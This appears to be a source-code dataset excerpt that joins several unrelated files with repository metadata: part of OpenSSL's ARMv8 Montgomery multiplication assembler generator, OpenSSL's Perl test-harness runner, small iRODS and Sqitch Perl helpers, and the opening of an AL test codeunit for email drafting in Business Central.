adcs $acc1,$acc1,xzr
sub $ap,$ap,$num // rewind ap
adcs $acc2,$acc2,xzr
stp $acc0,$acc1,[$tp,#8*0] // result!!!
adcs $acc3,$acc3,xzr
ldp $acc0,$acc1,[sp,#8*4] // t[0..3]
adc $topmost,$carry,xzr
stp $acc2,$acc3,[$tp,#8*2] // result!!!
cmp $bp,$t3 // done yet?
ldp $acc2,$acc3,[sp,#8*6]
ldp $m0,$m1,[$t1,#8*0] // n[0..3]
ldp $m2,$m3,[$t1,#8*2]
add $np,$t1,#8*4
b.eq .Lmul4x_post
ldr $bi,[$bp]
ldp $a0,$a1,[$ap,#8*0] // a[0..3]
ldp $a2,$a3,[$ap,#8*2]
adds $ap,$ap,#8*4 // clear carry bit
mov $carry,xzr
mov $tp,sp
b .Loop_mul4x_reduction
.align 4
.Lmul4x_post:
// Final step. We see if result is larger than modulus, and
// if it is, subtract the modulus. But comparison implies
// subtraction. So we subtract modulus, see if it borrowed,
// and conditionally copy original value.
mov $rp,$t2
mov $ap_end,$t2 // $rp copy
subs $t0,$acc0,$m0
add $tp,sp,#8*8
sbcs $t1,$acc1,$m1
sub $cnt,$num,#8*4
.Lmul4x_sub:
sbcs $t2,$acc2,$m2
ldp $m0,$m1,[$np,#8*0]
sub $cnt,$cnt,#8*4
ldp $acc0,$acc1,[$tp,#8*0]
sbcs $t3,$acc3,$m3
ldp $m2,$m3,[$np,#8*2]
add $np,$np,#8*4
ldp $acc2,$acc3,[$tp,#8*2]
add $tp,$tp,#8*4
stp $t0,$t1,[$rp,#8*0]
sbcs $t0,$acc0,$m0
stp $t2,$t3,[$rp,#8*2]
add $rp,$rp,#8*4
sbcs $t1,$acc1,$m1
cbnz $cnt,.Lmul4x_sub
sbcs $t2,$acc2,$m2
mov $tp,sp
add $ap,sp,#8*4
ldp $a0,$a1,[$ap_end,#8*0]
sbcs $t3,$acc3,$m3
stp $t0,$t1,[$rp,#8*0]
ldp $a2,$a3,[$ap_end,#8*2]
stp $t2,$t3,[$rp,#8*2]
ldp $acc0,$acc1,[$ap,#8*0]
ldp $acc2,$acc3,[$ap,#8*2]
sbcs xzr,$topmost,xzr // did it borrow?
ldr x30,[x29,#8] // pull return address
sub $cnt,$num,#8*4
.Lmul4x_cond_copy:
sub $cnt,$cnt,#8*4
csel $t0,$acc0,$a0,lo
stp xzr,xzr,[$tp,#8*0]
csel $t1,$acc1,$a1,lo
ldp $a0,$a1,[$ap_end,#8*4]
ldp $acc0,$acc1,[$ap,#8*4]
csel $t2,$acc2,$a2,lo
stp xzr,xzr,[$tp,#8*2]
add $tp,$tp,#8*4
csel $t3,$acc3,$a3,lo
ldp $a2,$a3,[$ap_end,#8*6]
ldp $acc2,$acc3,[$ap,#8*6]
add $ap,$ap,#8*4
stp $t0,$t1,[$ap_end,#8*0]
stp $t2,$t3,[$ap_end,#8*2]
add $ap_end,$ap_end,#8*4
cbnz $cnt,.Lmul4x_cond_copy
csel $t0,$acc0,$a0,lo
stp xzr,xzr,[$tp,#8*0]
csel $t1,$acc1,$a1,lo
stp xzr,xzr,[$tp,#8*2]
csel $t2,$acc2,$a2,lo
stp xzr,xzr,[$tp,#8*3]
csel $t3,$acc3,$a3,lo
stp xzr,xzr,[$tp,#8*4]
stp $t0,$t1,[$ap_end,#8*0]
stp $t2,$t3,[$ap_end,#8*2]
b .Lmul4x_done
.align 4
.Lmul4x4_post_condition:
adc $carry,$carry,xzr
ldr $ap,[x29,#96] // pull rp
// $acc0-3,$carry hold result, $m0-7 hold modulus
subs $a0,$acc0,$m0
ldr x30,[x29,#8] // pull return address
sbcs $a1,$acc1,$m1
stp xzr,xzr,[sp,#8*0]
sbcs $a2,$acc2,$m2
stp xzr,xzr,[sp,#8*2]
sbcs $a3,$acc3,$m3
stp xzr,xzr,[sp,#8*4]
sbcs xzr,$carry,xzr // did it borrow?
stp xzr,xzr,[sp,#8*6]
// $a0-3 hold result-modulus
csel $a0,$acc0,$a0,lo
csel $a1,$acc1,$a1,lo
csel $a2,$acc2,$a2,lo
csel $a3,$acc3,$a3,lo
stp $a0,$a1,[$ap,#8*0]
stp $a2,$a3,[$ap,#8*2]
.Lmul4x_done:
ldp x19,x20,[x29,#16]
mov sp,x29
ldp x21,x22,[x29,#32]
mov x0,#1
ldp x23,x24,[x29,#48]
ldp x25,x26,[x29,#64]
ldp x27,x28,[x29,#80]
ldr x29,[sp],#128
.inst 0xd50323bf // autiasp
ret
.size __bn_mul4x_mont,.-__bn_mul4x_mont
___
}
$code.=<<___;
.asciz "Montgomery Multiplication for ARMv8, CRYPTOGAMS by <appro\@openssl.org>"
.align 4
___
print $code;
close STDOUT or die "error closing STDOUT: $!";
| 24.508564 | 80 | 0.551607 |
73d4d91931c08a89f7b75d8fc38e65720f5625f0 | 11,031 | pl | Perl | test/run_tests.pl | JedrzejczykRobert/openssl | 2bd2a4c8e8c8cdc614f0a2c4afae52a04d397bf3 | [
"Apache-2.0"
] | 1 | 2020-09-17T05:36:02.000Z | 2020-09-17T05:36:02.000Z | test/run_tests.pl | tomsteal1/openssl | 79410c5f8b139c423be436810b4fe4de4637fc24 | [
"Apache-2.0"
] | 3 | 2020-08-16T07:46:15.000Z | 2020-09-02T20:14:32.000Z | test/run_tests.pl | tomsteal1/openssl | 79410c5f8b139c423be436810b4fe4de4637fc24 | [
"Apache-2.0"
] | 1 | 2020-07-28T01:49:05.000Z | 2020-07-28T01:49:05.000Z | #! /usr/bin/env perl
# Copyright 2015-2020 The OpenSSL Project Authors. All Rights Reserved.
#
# Licensed under the Apache License 2.0 (the "License"). You may not use
# this file except in compliance with the License. You can obtain a copy
# in the file LICENSE in the source distribution or at
# https://www.openssl.org/source/license.html
use strict;
use warnings;
# Recognise VERBOSE aka V which is common on other projects.
# Additionally, recognise VERBOSE_FAILURE aka VF aka REPORT_FAILURES
# and recognise VERBOSE_FAILURE_PROGRESS aka VFP aka REPORT_FAILURES_PROGRESS.
BEGIN {
$ENV{HARNESS_VERBOSE} = "yes" if $ENV{VERBOSE} || $ENV{V};
$ENV{HARNESS_VERBOSE_FAILURE} = "yes"
if $ENV{VERBOSE_FAILURE} || $ENV{VF} || $ENV{REPORT_FAILURES};
$ENV{HARNESS_VERBOSE_FAILURE_PROGRESS} = "yes"
if ($ENV{VERBOSE_FAILURE_PROGRESS} || $ENV{VFP}
|| $ENV{REPORT_FAILURES_PROGRESS});
}
use File::Spec::Functions qw/catdir catfile curdir abs2rel rel2abs/;
use File::Basename;
use FindBin;
use lib "$FindBin::Bin/../util/perl";
use OpenSSL::Glob;
my $srctop = $ENV{SRCTOP} || $ENV{TOP};
my $bldtop = $ENV{BLDTOP} || $ENV{TOP};
my $recipesdir = catdir($srctop, "test", "recipes");
my $libdir = rel2abs(catdir($srctop, "util", "perl"));
my $jobs = $ENV{HARNESS_JOBS};
$ENV{OPENSSL_CONF} = rel2abs(catdir($srctop, "apps", "openssl.cnf"));
$ENV{OPENSSL_CONF_INCLUDE} = rel2abs(catdir($bldtop, "providers"));
$ENV{OPENSSL_MODULES} = rel2abs(catdir($bldtop, "providers"));
$ENV{OPENSSL_ENGINES} = rel2abs(catdir($bldtop, "engines"));
$ENV{CTLOG_FILE} = rel2abs(catdir($srctop, "test", "ct", "log_list.cnf"));
my %tapargs =
( verbosity => $ENV{HARNESS_VERBOSE} ? 1 : 0,
lib => [ $libdir ],
switches => '-w',
merge => 1,
);
$tapargs{jobs} = $jobs if defined $jobs;
# Additional OpenSSL special TAP arguments. Because we can't pass them via
# TAP::Harness->new(), they will be accessed directly, see the
# TAP::Parser::OpenSSL implementation further down
my %openssl_args = ();
$openssl_args{'failure_verbosity'} = $ENV{HARNESS_VERBOSE} ? 0 :
$ENV{HARNESS_VERBOSE_FAILURE_PROGRESS} ? 2 :
1; # $ENV{HARNESS_VERBOSE_FAILURE}
print "Warning: HARNESS_VERBOSE overrides HARNESS_VERBOSE_FAILURE*\n"
if ($ENV{HARNESS_VERBOSE} && ($ENV{HARNESS_VERBOSE_FAILURE}
|| $ENV{HARNESS_VERBOSE_FAILURE_PROGRESS}));
print "Warning: HARNESS_VERBOSE_FAILURE_PROGRESS overrides HARNESS_VERBOSE_FAILURE\n"
if ($ENV{HARNESS_VERBOSE_FAILURE_PROGRESS} && $ENV{HARNESS_VERBOSE_FAILURE});
my $outfilename = $ENV{HARNESS_TAP_COPY};
open $openssl_args{'tap_copy'}, ">$outfilename"
or die "Trying to create $outfilename: $!\n"
if defined $outfilename;
my @alltests = find_matching_tests("*");
my %tests = ();
sub reorder {
my $key = pop;
# for parallel test runs, do slow tests first
if (defined $jobs && $jobs > 1 && $key =~ m/test_ssl_new|test_fuzz/) {
$key =~ s/(\d+)-/00-/;
}
return $key;
}
my $initial_arg = 1;
foreach my $arg (@ARGV ? @ARGV : ('alltests')) {
if ($arg eq 'list') {
foreach (@alltests) {
(my $x = basename($_)) =~ s|^[0-9][0-9]-(.*)\.t$|$1|;
print $x,"\n";
}
exit 0;
}
if ($arg eq 'alltests') {
warn "'alltests' encountered, ignoring everything before that...\n"
unless $initial_arg;
%tests = map { $_ => 1 } @alltests;
} elsif ($arg =~ m/^(-?)(.*)/) {
my $sign = $1;
my $test = $2;
my @matches = find_matching_tests($test);
# If '-foo' is the first arg, it's short for 'alltests -foo'
if ($sign eq '-' && $initial_arg) {
%tests = map { $_ => 1 } @alltests;
}
if (scalar @matches == 0) {
warn "Test $test found no match, skipping ",
($sign eq '-' ? "removal" : "addition"),
"...\n";
} else {
foreach $test (@matches) {
if ($sign eq '-') {
delete $tests{$test};
} else {
$tests{$test} = 1;
}
}
}
} else {
warn "I don't know what '$arg' is about, ignoring...\n";
}
$initial_arg = 0;
}
sub find_matching_tests {
my ($glob) = @_;
if ($glob =~ m|^[\d\[\]\?\-]+$|) {
return glob(catfile($recipesdir,"$glob-*.t"));
}
return glob(catfile($recipesdir,"*-$glob.t"));
}
# The following is quite a bit of hackery to adapt to both TAP::Harness
# and Test::Harness, depending on what's available.
# The TAP::Harness hack allows support for HARNESS_VERBOSE_FAILURE* and
# HARNESS_TAP_COPY, while the Test::Harness hack can't, because the pre
# TAP::Harness Test::Harness simply doesn't have support for this sort of
# thing.
#
# We use eval to avoid undue interruption if TAP::Harness isn't present.
my $package;
my $eres;
$eres = eval {
package TAP::Parser::OpenSSL;
use parent 'TAP::Parser';
sub new {
my $class = shift;
my %opts = %{ shift() };
my $failure_verbosity = $openssl_args{failure_verbosity};
my @plans = (); # initial level, no plan yet
my $output_buffer = "";
# We rely heavily on perl closures to make failure verbosity work
# We need to do so, because there's no way to safely pass extra
# objects down all the way to the TAP::Parser::Result object
my @failure_output = ();
my %callbacks = ();
if ($failure_verbosity > 0 || defined $openssl_args{tap_copy}) {
$callbacks{ALL} = sub { # on each line of test output
my $self = shift;
my $fh = $openssl_args{tap_copy};
print $fh $self->as_string, "\n"
if defined $fh;
my $failure_verbosity = $openssl_args{failure_verbosity};
if ($failure_verbosity > 0) {
my $is_plan = $self->is_plan;
my $tests_planned = $is_plan && $self->tests_planned;
my $is_test = $self->is_test;
my $is_ok = $is_test && $self->is_ok;
# workaround for parser not coping with sub-test indentation
if ($self->is_unknown) {
my $level = $#plans;
my $indent = $level < 0 ? "" : " " x ($level * 4);
($is_plan, $tests_planned) = (1, $1)
if ($self->as_string =~ m/^$indent 1\.\.(\d+)/);
($is_test, $is_ok) = (1, !$1)
if ($self->as_string =~ m/^$indent(not )?ok /);
}
if ($is_plan) {
push @plans, $tests_planned;
$output_buffer = ""; # ignore comments etc. until plan
} elsif ($is_test) { # result of a test
pop @plans if @plans && --($plans[-1]) <= 0;
print $output_buffer if !$is_ok;
print "\n".$self->as_string
if !$is_ok || $failure_verbosity == 2;
print "\n# ------------------------------------------------------------------------------" if !$is_ok;
$output_buffer = "";
} elsif ($self->as_string ne "") {
# typically is_comment or is_unknown
$output_buffer .= "\n".$self->as_string;
}
}
}
}
if ($failure_verbosity > 0) {
$callbacks{EOF} = sub {
my $self = shift;
# We know we are a TAP::Parser::Aggregator object
if (scalar $self->failed > 0 && @failure_output) {
# We add an extra empty line, because in the case of a
# progress counter, we're still at the end of that progress
# line.
print $_, "\n" foreach (("", @failure_output));
}
# Echo any trailing comments etc.
print "$output_buffer";
};
}
if (keys %callbacks) {
# If %opts already has a callbacks element, the order here
# ensures we do not override it
%opts = ( callbacks => { %callbacks }, %opts );
}
return $class->SUPER::new({ %opts });
}
package TAP::Harness::OpenSSL;
use parent 'TAP::Harness';
package main;
$tapargs{parser_class} = "TAP::Parser::OpenSSL";
$package = 'TAP::Harness::OpenSSL';
};
unless (defined $eres) {
$eres = eval {
# Fake TAP::Harness in case it's not loaded
package TAP::Harness::fake;
use parent 'Test::Harness';
sub new {
my $class = shift;
my %args = %{ shift() };
return bless { %args }, $class;
}
sub runtests {
my $self = shift;
# Pre TAP::Harness Test::Harness doesn't support [ filename, name ]
# elements, so convert such elements to just be the filename
my @args = map { ref($_) eq 'ARRAY' ? $_->[0] : $_ } @_;
my @switches = ();
if ($self->{switches}) {
push @switches, $self->{switches};
}
if ($self->{lib}) {
foreach (@{$self->{lib}}) {
my $l = $_;
# It seems that $switches is getting interpreted with 'eval'
# or something like that, and that we need to take care of
# backslashes or they will disappear along the way.
$l =~ s|\\|\\\\|g if $^O eq "MSWin32";
push @switches, "-I$l";
}
}
$Test::Harness::switches = join(' ', @switches);
Test::Harness::runtests(@args);
}
package main;
$package = 'TAP::Harness::fake';
};
}
unless (defined $eres) {
print $@,"\n" if $@;
print $!,"\n" if $!;
exit 127;
}
my $harness = $package->new(\%tapargs);
my $ret =
$harness->runtests(map { [ abs2rel($_, rel2abs(curdir())), basename($_) ] }
sort { reorder($a) cmp reorder($b) } keys %tests);
# $ret->has_errors may be any number, not just 0 or 1. On VMS, numbers
# from 2 and on are used as is as VMS statuses, which has severity encoded
# in the lower 3 bits. 0 and 1, on the other hand, generate SUCCESS and
# FAILURE, so for currect reporting on all platforms, we make sure the only
# exit codes are 0 and 1. Double-bang is the trick to do so.
exit !!$ret->has_errors if (ref($ret) eq "TAP::Parser::Aggregator");
# If this isn't a TAP::Parser::Aggregator, it's the pre-TAP test harness,
# which simply dies at the end if any test failed, so we don't need to bother
# with any exit code in that case.
| 36.04902 | 126 | 0.534494 |
ed620257404a007ded4d2897d5aa2cbe8da92a95 | 380 | pl | Perl | iRODS/scripts/perl/irods_get_config_dir.pl | iychoi/cyverse-irods | 0070b8677a82e763f1d940ae6537b1c8839a628a | [
"BSD-3-Clause"
] | null | null | null | iRODS/scripts/perl/irods_get_config_dir.pl | iychoi/cyverse-irods | 0070b8677a82e763f1d940ae6537b1c8839a628a | [
"BSD-3-Clause"
] | 6 | 2019-12-02T18:17:44.000Z | 2019-12-02T18:17:57.000Z | iRODS/scripts/perl/irods_get_config_dir.pl | iychoi/cyverse-irods | 0070b8677a82e763f1d940ae6537b1c8839a628a | [
"BSD-3-Clause"
] | 1 | 2019-12-02T05:40:13.000Z | 2019-12-02T05:40:13.000Z | use Cwd "abs_path";
use File::Basename;
use File::Spec;
$scriptfullpath = abs_path(__FILE__);
$scripttoplevel = dirname(dirname(dirname(dirname($scriptfullpath))));
if ( -e "$scripttoplevel/packaging/binary_installation.flag" )
{
$configDir = "/etc/irods";
}
else
{
$configDir = File::Spec->catdir( "$scripttoplevel", "iRODS", "config" );
}
print "$configDir";
| 21.111111 | 80 | 0.678947 |
ed95ae760fa2cc808e100d5fa7ee6cc58c50748b | 391 | pm | Perl | t/lib/LC.pm | AndreSteenveld/sqitch | a2c920545cdba64367c88b77a6268b0fc503f0d3 | [
"MIT"
] | 1,016 | 2018-05-30T20:09:27.000Z | 2022-03-23T02:02:14.000Z | t/lib/LC.pm | AndreSteenveld/sqitch | a2c920545cdba64367c88b77a6268b0fc503f0d3 | [
"MIT"
] | 241 | 2018-05-30T19:50:54.000Z | 2022-03-27T18:42:12.000Z | t/lib/LC.pm | AndreSteenveld/sqitch | a2c920545cdba64367c88b77a6268b0fc503f0d3 | [
"MIT"
] | 87 | 2018-06-06T13:38:19.000Z | 2022-03-30T10:17:44.000Z | package LC;
our $TIME = do {
if ($^O eq 'MSWin32') {
require Win32::Locale;
Win32::Locale::get_locale();
} else {
require POSIX;
POSIX::setlocale( POSIX::LC_TIME() );
}
};
# https://github.com/sqitchers/sqitch/issues/230#issuecomment-103946451
# https://rt.cpan.org/Ticket/Display.html?id=104574
$TIME = 'en_US_POSIX' if $TIME eq 'C.UTF-8';
1;
| 21.722222 | 71 | 0.608696 |
eda805893fff5cfc149f12e14c3bafe2cee23adf | 66,524 | al | Perl | Modules/System Tests/Email/src/EmailTest.Codeunit.al | AndersLarsenMicrosoft/ALAppExtensions | 31000fa1bb6bedac17a8141e2ac1ab607e466ec5 | [
"MIT"
] | 1 | 2022-03-28T01:20:39.000Z | 2022-03-28T01:20:39.000Z | Modules/System Tests/Email/src/EmailTest.Codeunit.al | snu-development/ALAppExtensions | 371a27fe48483be776642dde19483a87ae27289c | [
"MIT"
] | null | null | null | Modules/System Tests/Email/src/EmailTest.Codeunit.al | snu-development/ALAppExtensions | 371a27fe48483be776642dde19483a87ae27289c | [
"MIT"
] | null | null | null | // ------------------------------------------------------------------------------------------------
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License. See License.txt in the project root for license information.
// ------------------------------------------------------------------------------------------------
codeunit 134685 "Email Test"
{
Subtype = Test;
Permissions = tabledata "Email Message" = rd,
tabledata "Email Message Attachment" = rd,
tabledata "Email Recipient" = rd,
tabledata "Email Outbox" = rimd,
tabledata "Scheduled Task" = rd,
tabledata "Sent Email" = rid;
EventSubscriberInstance = Manual;
var
Assert: Codeunit "Library Assert";
Email: Codeunit Email;
Base64Convert: Codeunit "Base64 Convert";
PermissionsMock: Codeunit "Permissions Mock";
EmailMessageDoesNotExistMsg: Label 'The email message has been deleted by another user.', Locked = true;
EmailMessageOpenPermissionErr: Label 'You do not have permission to open the email message.';
EmailMessageCannotBeEditedErr: Label 'The email message has already been sent and cannot be edited.';
EmailMessageQueuedCannotDeleteAttachmentErr: Label 'Cannot delete the attachment because the email has been queued to be sent.';
EmailMessageSentCannotDeleteAttachmentErr: Label 'Cannot delete the attachment because the email has already been sent.';
AccountNameLbl: Label '%1 (%2)', Locked = true;
NoRelatedAttachmentsErr: Label 'Did not find any attachments related to this email.';
[Test]
[Scope('OnPrem')]
[TransactionModel(TransactionModel::AutoRollback)]
procedure NonExistingEmailMessageFailsTest()
var
Message: Record "Email Message";
EmailMessage: Codeunit "Email Message";
begin
// [Scenario] User cannot save as draft, enqueue, send or open (in editor) a non-existing email message
PermissionsMock.Set('Email Edit');
// [Given] Create an Email Message and delete the underlying record
CreateEmail(EmailMessage);
Assert.IsTrue(Message.Get(EmailMessage.GetId()), 'The record should have been created');
Message.Delete();
Assert.IsFalse(EmailMessage.Get(EmailMessage.GetId()), 'The email should not exist');
// [When] Saving a non-existing email message as draft
ClearLastError();
asserterror Email.SaveAsDraft(EmailMessage);
// [Then] An error occurs
Assert.ExpectedError(EmailMessageDoesNotExistMsg);
// [When] Enqueuing a non-existing email message
ClearLastError();
asserterror Email.Enqueue(EmailMessage);
// [Then] An error occurs
Assert.ExpectedError(EmailMessageDoesNotExistMsg);
// [When] Sending a non-existing email message
ClearLastError();
asserterror Email.Send(EmailMessage);
// [Then] An error occurs
Assert.ExpectedError(EmailMessageDoesNotExistMsg);
// [When] Opening a non-existing email message
ClearLastError();
asserterror Email.OpenInEditor(EmailMessage);
// [Then] An error occurs
Assert.ExpectedError(EmailMessageDoesNotExistMsg);
// [When] Opening a non-existing email message modally
ClearLastError();
asserterror Email.OpenInEditorModally(EmailMessage);
// [Then] An error occurs
Assert.ExpectedError(EmailMessageDoesNotExistMsg);
end;
[Test]
[Scope('OnPrem')]
[TransactionModel(TransactionModel::AutoRollback)]
procedure SaveAsDraftEmailMessage()
var
EmailOutbox: Record "Email Outbox";
EmailMessage: Codeunit "Email Message";
EmptyConnector: Enum "Email Connector";
EmptyGuid: Guid;
begin
// [Scenario] When saving an existing email as draft, it appears in the outbox
PermissionsMock.Set('Email Edit');
// [Given] An email message
CreateEmail(EmailMessage);
Assert.IsTrue(EmailMessage.Get(EmailMessage.GetId()), 'The email message should exist');
// [When] Saving the email message as draft
ClearLastError();
Email.SaveAsDraft(EmailMessage);
// [Then] No error occurs
Assert.AreEqual('', GetLastErrorText(), 'There should be no errors when saving an email.');
// [Then] The draft email should be correct
EmailOutbox.SetRange("Message Id", EmailMessage.GetId());
Assert.AreEqual(1, EmailOutbox.Count(), 'There should be only one draft email');
Assert.IsTrue(EmailOutbox.FindFirst(), 'The message should be in the outbox');
Assert.AreEqual(EmptyGuid, EmailOutbox."Account Id", 'The account should not be set');
Assert.AreEqual(EmptyConnector, EmailOutbox.Connector, 'The connector should not be set');
Assert.AreEqual(EmailOutbox.Status::"Draft", EmailOutbox.Status, 'The status should be ''Draft''');
Assert.AreEqual(UserSecurityId(), EmailOutbox."User Security Id", 'The user security ID should be the current user');
Assert.AreEqual(EmailMessage.GetSubject(), EmailOutbox.Description, 'The description does not match the email title');
Assert.AreEqual('', EmailOutbox."Error Message", 'The error message should be blank');
end;
[Test]
[Scope('OnPrem')]
[TransactionModel(TransactionModel::AutoRollback)]
procedure SaveAsDraftEmailMessageTwice()
var
EmailOutbox: Record "Email Outbox";
EmailMessage: Codeunit "Email Message";
EmptyConnector: Enum "Email Connector";
EmptyGuid: Guid;
begin
// [Scenario] When enqueuing an existing email, it appears in the outbox
PermissionsMock.Set('Email Edit');
// [Given] A GUID of an email
CreateEmail(EmailMessage);
Assert.IsTrue(EmailMessage.Get(EmailMessage.GetId()), 'The email message should exist');
// [When] Enqueuing the email
ClearLastError();
Email.SaveAsDraft(EmailMessage);
// [Then] No error occurs
Assert.AreEqual('', GetLastErrorText(), 'There should be no errors when saving the email message.');
// [Then] The draft email should be the correct one
EmailOutbox.SetRange("Message Id", EmailMessage.GetId());
Assert.AreEqual(1, EmailOutbox.Count(), 'There should be only one enqueued message');
Assert.IsTrue(EmailOutbox.FindFirst(), 'The message should be queued');
Assert.AreEqual(EmptyGuid, EmailOutbox."Account Id", 'The account should not be set');
Assert.AreEqual(EmptyConnector, EmailOutbox.Connector, 'The connector should not be set');
Assert.AreEqual(EmailOutbox.Status::"Draft", EmailOutbox.Status, 'The status should be ''Draft''');
Assert.AreEqual(UserSecurityId(), EmailOutbox."User Security Id", 'The user security ID should be the current user');
Assert.AreEqual(EmailMessage.GetSubject(), EmailOutbox.Description, 'The description does not match the email title');
Assert.AreEqual('', EmailOutbox."Error Message", 'The error message should be blank');
// [When] Saving the email message again
ClearLastError();
Email.SaveAsDraft(EmailMessage);
// [Then] No error occurs
Assert.AreEqual('', GetLastErrorText(), 'There should be no errors when saving the email message again.');
// [Then] The draft email should be the correct one
EmailOutbox.SetRange("Message Id", EmailMessage.GetId());
Assert.AreEqual(1, EmailOutbox.Count(), 'There should be only one draft message');
Assert.IsTrue(EmailOutbox.FindFirst(), 'The message should be queued');
Assert.AreEqual(EmptyGuid, EmailOutbox."Account Id", 'The account should not be set');
Assert.AreEqual(EmptyConnector, EmailOutbox.Connector, 'The connector should not be set');
Assert.AreEqual(EmailOutbox.Status::"Draft", EmailOutbox.Status, 'The status should be ''Draft''');
Assert.AreEqual(UserSecurityId(), EmailOutbox."User Security Id", 'The user security ID should be the current user');
Assert.AreEqual(EmailMessage.GetSubject(), EmailOutbox.Description, 'The description does not match the email title');
Assert.AreEqual('', EmailOutbox."Error Message", 'The error message should be blank');
end;
[Test]
[HandlerFunctions('CloseEmailEditorHandler')]
procedure OpenMessageInEditorTest()
var
TempAccount: Record "Email Account" temporary;
EmailMessage: Codeunit "Email Message";
ConnectorMock: Codeunit "Connector Mock";
EmailEditor: TestPage "Email Editor";
Recipients: List of [Text];
begin
// Initialize
ConnectorMock.Initialize();
ConnectorMock.AddAccount(TempAccount);
PermissionsMock.Set('Email Edit');
Recipients.Add('recipient1@test.com');
Recipients.Add('recipient2@test.com');
EmailMessage.Create(Recipients, 'Test subject', 'Test body', true);
EmailMessage.AddAttachment('Attachment1', 'text/plain', Base64Convert.ToBase64('Content'));
EmailMessage.AddAttachment('Attachment1', 'text/plain', Base64Convert.ToBase64('Content'));
// Exercise
EmailEditor.Trap();
Email.OpenInEditor(EmailMessage);
// Verify
Assert.AreEqual('', EmailEditor.Account.Value(), 'Account field was not blank.');
Assert.AreEqual('recipient1@test.com;recipient2@test.com', EmailEditor.ToField.Value(), 'A different To was expected');
Assert.AreEqual('Test subject', EmailEditor.SubjectField.Value(), 'A different subject was expected.');
Assert.AreEqual('Test body', EmailEditor.BodyField.Value(), 'A different body was expected.');
Assert.AreEqual('', EmailEditor.CcField.Value(), 'Cc field was not blank.');
Assert.AreEqual('', EmailEditor.BccField.Value(), 'Bcc field was not blank.');
Assert.IsTrue(EmailEditor.Attachments.First(), 'First Attachment was not found.');
Assert.AreEqual('Attachment1', EmailEditor.Attachments.FileName.Value(), 'A different attachment filename was expected');
Assert.IsTrue(EmailEditor.Attachments.Next(), 'Second Attachment was not found.');
Assert.AreEqual('Attachment1', EmailEditor.Attachments.FileName.Value(), 'A different attachment filename was expected');
// Exercise
EmailEditor.Trap();
Email.OpenInEditor(EmailMessage, TempAccount);
// Verify
Assert.AreEqual(StrSubstNo(AccountNameLbl, TempAccount.Name, TempAccount."Email Address"), EmailEditor.Account.Value(), 'A different account was expected');
Assert.AreEqual('recipient1@test.com;recipient2@test.com', EmailEditor.ToField.Value(), 'A different To was expected');
Assert.AreEqual('Test subject', EmailEditor.SubjectField.Value(), 'A different subject was expected.');
Assert.AreEqual('Test body', EmailEditor.BodyField.Value(), 'A different body was expected.');
Assert.AreEqual('', EmailEditor.CcField.Value(), 'Cc field was not blank.');
Assert.AreEqual('', EmailEditor.BccField.Value(), 'Bcc field was not blank.');
Assert.IsTrue(EmailEditor.Attachments.First(), 'First Attachment was not found.');
Assert.AreEqual('Attachment1', EmailEditor.Attachments.FileName.Value(), 'A different attachment filename was expected');
Assert.IsTrue(EmailEditor.Attachments.Next(), 'Second Attachment was not found.');
Assert.AreEqual('Attachment1', EmailEditor.Attachments.FileName.Value(), 'A different attachment filename was expected');
// Exercise
EmailEditor.Trap();
Email.OpenInEditor(EmailMessage, TempAccount);
// Verify
Assert.AreEqual(StrSubstNo(AccountNameLbl, TempAccount.Name, TempAccount."Email Address"), EmailEditor.Account.Value(), 'A different account was expected');
Assert.AreEqual('recipient1@test.com;recipient2@test.com', EmailEditor.ToField.Value(), 'A different To was expected');
Assert.AreEqual('Test subject', EmailEditor.SubjectField.Value(), 'A different subject was expected.');
Assert.AreEqual('Test body', EmailEditor.BodyField.Value(), 'A different body was expected.');
Assert.AreEqual('', EmailEditor.CcField.Value(), 'Cc field was not blank.');
Assert.AreEqual('', EmailEditor.BccField.Value(), 'Bcc field was not blank.');
Assert.IsTrue(EmailEditor.Attachments.First(), 'First Attachment was not found.');
Assert.AreEqual('Attachment1', EmailEditor.Attachments.FileName.Value(), 'A different attachment filename was expected');
Assert.IsTrue(EmailEditor.Attachments.Next(), 'Second Attachment was not found.');
Assert.AreEqual('Attachment1', EmailEditor.Attachments.FileName.Value(), 'A different attachment filename was expected');
end;
[Test]
[TransactionModel(TransactionModel::AutoRollback)]
procedure OpenMessageInEditorForAQueuedMessageTest()
var
TempAccount: Record "Email Account" temporary;
EmailOutBox: Record "Email Outbox";
EmailMessageAttachment: Record "Email Message Attachment";
EmailMessage: Codeunit "Email Message";
ConnectorMock: Codeunit "Connector Mock";
EmailEditor: TestPage "Email Editor";
begin
// Initialize
ConnectorMock.Initialize();
ConnectorMock.AddAccount(TempAccount);
PermissionsMock.Set('Email Edit');
CreateEmail(EmailMessage);
EmailMessage.AddAttachment('Attachment1', 'text/plain', Base64Convert.ToBase64('Content'));
EmailMessage.AddAttachment('Attachment1', 'text/plain', Base64Convert.ToBase64('Content'));
EmailOutBox.Init();
EmailOutBox."Account Id" := TempAccount."Account Id";
EmailOutBox.Connector := Enum::"Email Connector"::"Test Email Connector";
EmailOutBox."Message Id" := EmailMessage.GetId();
EmailOutBox.Status := Enum::"Email Status"::Queued;
EmailOutBox."User Security Id" := UserSecurityId();
EmailOutBox.Insert();
// Exercise
EmailEditor.Trap();
Email.OpenInEditor(EmailMessage);
// Verify
Assert.IsFalse(EmailEditor.Account.Enabled(), 'Account field was enabled');
Assert.IsFalse(EmailEditor.ToField.Editable(), 'To field was editable');
Assert.IsFalse(EmailEditor.CcField.Editable(), 'Cc field was editable');
Assert.IsFalse(EmailEditor.BccField.Editable(), 'Bcc field was editable');
Assert.IsFalse(EmailEditor.SubjectField.Editable(), 'Subject field was editable');
Assert.IsFalse(EmailEditor.BodyField.Editable(), 'Body field was editable');
#if not CLEAN19
Assert.IsFalse(EmailEditor.Upload.Enabled(), 'Upload Action was not disabled.');
#else
Assert.IsFalse(EmailEditor.Attachments.Upload.Visible(), 'Upload Action is visible.');
#endif
Assert.IsFalse(EmailEditor.Send.Enabled(), 'Send Action was not disabled.');
EmailOutBox.Status := Enum::"Email Status"::Processing;
EmailOutBox.Modify();
// Exercise
EmailEditor.Trap();
Email.OpenInEditor(EmailMessage);
// Verify
Assert.IsFalse(EmailEditor.Account.Enabled(), 'Account field was enabled');
Assert.IsFalse(EmailEditor.ToField.Editable(), 'To field was editable');
Assert.IsFalse(EmailEditor.CcField.Editable(), 'Cc field was editable');
Assert.IsFalse(EmailEditor.BccField.Editable(), 'Bcc field was editable');
Assert.IsFalse(EmailEditor.SubjectField.Editable(), 'Subject field was editable');
Assert.IsFalse(EmailEditor.BodyField.Editable(), 'Body field was editable');
#if not CLEAN19
